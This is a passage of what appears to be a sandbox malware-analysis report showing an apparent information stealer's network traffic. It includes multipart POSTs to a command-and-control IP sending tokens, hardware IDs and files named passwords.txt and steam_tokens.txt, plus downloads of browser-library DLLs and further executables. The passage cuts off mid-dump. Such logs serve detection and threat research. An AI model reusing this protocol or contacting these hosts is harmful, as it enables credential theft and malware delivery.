0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="mode"21------ECAKKKKJDBKKFIEBKEHD--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 147.45.68.138Content-Length: 6325Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBFHost: 147.45.68.138Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 2d 2d 0d 0a Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_data"------BGIJJKKJJDAAAAAKFHJJ--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_data"------GHJKJDAKEHJDGDGDGHID--
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHDHost: 147.45.68.138Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"3------GHJKJDAKEHJDGDGDGHID--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJJECFIEBFHIEGHJDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="mode"4------KJKJJJECFIEBFHIEGHJD--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEBHost: 147.45.68.138Content-Length: 457Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 2b 64 41 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_data"N+dA------AKJKFBAFIDAEBFHJKJEB--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 147.45.68.138Content-Length: 115113Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="mode"5------CFIECBFIDGDAKFHIEHJK--
                Source: global trafficHTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 33 35 34 34 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="mode"51------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="task_id"1035440------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="status"1------HIEBAKEHDHCAKEBFBKEG--
                Source: global trafficHTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 33 35 34 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="mode"51------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="task_id"1035441------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="status"1------JDGCGDBGCAAEBFIECGHD--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"6------DHIEBAAKJDHIECAAFHCA--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: stadiatechnologies.comContent-Length: 5777Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 2d 2d 0d 0a Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------DAKJDHIEBFIIDGDGDBAE--
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 